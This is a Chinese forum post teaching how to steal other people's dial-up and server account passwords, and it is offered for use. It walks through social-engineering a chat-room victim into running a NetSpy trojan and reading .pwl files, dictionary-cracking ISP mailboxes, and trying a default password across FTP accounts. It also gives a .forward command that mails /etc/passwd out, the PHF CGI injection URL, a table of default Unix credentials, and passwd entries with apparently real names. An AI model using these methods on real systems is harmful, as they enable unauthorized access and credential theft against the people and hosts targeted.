找回密码
 注册

QQ登录

只需一步,快速开始

如何得到别人的上网帐号和密码

[复制链接]
发表于 2011-1-12 21:03:35 | 显示全部楼层 |阅读模式
如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
! n0 H! y& L; [: g5 o* X7 L3 Y方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。  W% Y. Z7 \9 r. n1 W4 y0 l
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......6 Y" a& p& N, q: D& p3 U2 I
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。' }! K( e' _; W6 x4 [% b/ G
提示:先问清你的目标和你是不是在一个城市。
3 r! r" u2 ~: y实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。8 A/ R% ^" g, U" O8 a( J
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。
. U  R8 G6 n% w7 l7 p6 [忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。
! W  R; L; ~' s1 j: }% n方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客
- S7 d, z6 p7 U, C% t- m3 C$ q优点:没什么优点
# W7 e: t# U) k% b. p缺点:要具体情况具体对待,太麻烦
0 L8 l: x* w& u, L提示:平时多多留神。- k1 ]8 W. x( q# p* ]
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
/ ]8 C& J& [# k( G. }3 Y3 C( u! Z密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。1 r8 \, Q- y6 y3 |- d- I5 c
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破  h/ L1 o& z  [1 O
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
  _5 C' a! O+ C优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。6 F* r  {; I: ?# F5 n7 f: E6 u# C
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
0 V- I7 [1 I! w由于介绍此类的教学文章比较多,我就不班门弄斧了。 ' f+ w" z' O) W) i- R1 e5 X
3 L0 @2 a1 R* M' n
哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。" `# m  q! Z  A# V% f- P
只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
' y' e8 |+ Z/ [3 {有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:0 R0 k  u& S6 E) ]7 g9 l& f5 A# W
: T  F8 M' E; x( d3 `
------------------------------- ]! a, h$ B+ n
4 q& D% e' h% h% q
XXX,你好(XX是你在表格上填的名字)/ K! y2 b5 j/ ~- X$ V2 f
你在XX热线的主页空间已开通
% H- v) G# ~0 J' v# E帐户名:XXX 密码:11. k$ }5 T* o* B
-----------XX热线
0 S- H: f. V& C% J; r6 ^: m电话:XXXX-XXXXXXXX+ p$ [5 K8 D6 M. V2 I
------------------------------
+ t7 J# O' m3 O% T6 ?' \
% L8 d) S+ j* r, h" a/ F好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
4 o* W: }8 v5 u开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。$ B1 G, V- f1 ]- f3 P; H" U8 q
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
( a/ o8 A+ y& E; w/ Z# H9 W6 O  
- `/ f4 u$ b6 k# \- v6 R
8 b  r; u+ b, O5 z8 b6 R+ ]. X0 k                           如何获得第一个帐号
$ L* h: x. ~: l
' V# J& h7 Y/ [1 z# T" t) q  O, H我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.  I3 B7 b* t* p( ~
5 ]$ ]0 a7 M! B1 b+ \  C
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。
0 [3 J* Z0 i/ @0 W- Z' b( L) O, N/ T- ]$ J% |
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.
" o( }# ~7 R# j  x2 B/ C2 i
: ]* y: F+ q) I3 @以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-< 6 B  O5 C' |9 `& y; V7 y% U) N
" I9 l& b( O+ L6 |4 d6 `, |, s/ G
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!2 C( R! _5 m! N
! j. }5 M4 K( l7 v4 o& \( s, J1 u9 {
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:
  b# f* |) w) u- e' }' o8 T" x, Q- A" o9 c; f2 u% a
帐号     密码5 o. K% P* D! @) K# Y
----------- ----------------
2 C% L8 U/ \2 Sroot    root
) q9 ^4 W; K% `" [2 r2 Dsys     sys/system/bin3 z7 ?3 e1 d1 v$ \7 D+ v# V0 J4 r
bin     sys/bin9 M- x3 d( M7 C% s: U
mountfsys  mountfsys
7 T+ H% Z' |4 J. r1 cadm     adm
& m) O7 p& z1 x* {7 z) duucp    uucp1 W+ ]/ `. d8 m3 O3 W, J4 l& U2 z/ ^
nuucp    anon
5 l* l0 n. n8 e! t! _! vanon    anon
0 J/ _3 h  f2 w9 u: U& i" K' G$ Yuser    user% v  [+ ?+ `) A# T! r
games    games7 t7 I9 H/ D" y, {
install   install6 B1 G* B" R* D4 T+ d! K+ ], c9 F  ~
reboot   给 "command login" 用的
+ ~- G( r1 J: F' O. O( qdemo    demo
: k* s+ u) y; Yumountfsys umountfsys0 F* j: W4 t  ^
sync     sync& Z2 L9 e" o$ u. I' u
admin    admin
. F! A$ R0 P0 k& xguest    guest
5 |6 i  f. i4 E4 q% x5 f; Rdaemon   daemon
" Z" {0 ^' P& L' Q9 M* `________________________________________________________________
# U/ L* ~; o5 C' e
; ]  q' x9 b4 d- ^3 \! ^/ v有些管理员忘记把他们改掉,那你就发财了!2 b) ]1 m& G$ _" Q) I' v1 `4 X
8 S0 N# x# a+ F6 q5 x" R# F
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
* m1 t& a  R! |* ~' v
3 w6 Z( g9 {- f9 C7 c只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:5 H6 F4 }" w* ?
- k# {2 s3 S' a  P" D8 G
.........
2 w$ j+ i8 e* n3 t, n! s& J1 @# n" R' Q# E1 [
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
/ U& S: r7 U* X9 @. ?. p+ c7 }+ t% n  w5 F# s
qingyuan:x:275:50::/usr/qingyuan:/bin/sh$ j& B( o3 F, z/ v; d
) I  B, o# D7 M
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh2 K- m. s6 F2 O5 u
9 ~0 w: V9 ]* |, i6 |
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
3 Q! P: W, L/ h3 i% E/ Y. p5 K0 q* x4 C. O# e3 ^- M
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh+ |9 D# h! L' l. C
" C+ I$ F* W: v; C. M; `
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh' [9 O5 C! P) E/ j  ]
/ F! }) w) X6 u4 y
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
0 D- [: [, P! ], U0 Q' H% K8 G5 ~, B; N7 l
............+ n5 R( a6 |1 a$ R) F! ^/ y; n2 p8 X$ f
9 W. L* c0 E/ M3 O& x
这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.
) M. d4 g% b8 q  U0 s7 l2 k' |; v9 }* ~' @* o6 h
如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.4 ]" v- i6 T* r3 c' W: O. L% t& t
  z1 X  V( }2 h( j/ k
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.2 ~- M9 {5 m* F5 q0 f! ~. H

0 M7 A$ \$ U1 i0 A8 `6 r# M如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.2 M% h0 s- W* ~
/ Y# B( W- J2 b5 B  W- U
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.: u8 x2 Z% P! o7 I$ _# ~

. N: f8 }3 f; l+ n% g: Z( a你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.
# X9 R6 h+ E1 Q- l. O1 w/ ]9 J4 V
: k1 O1 S1 |3 ^
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-6-14 22:14

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表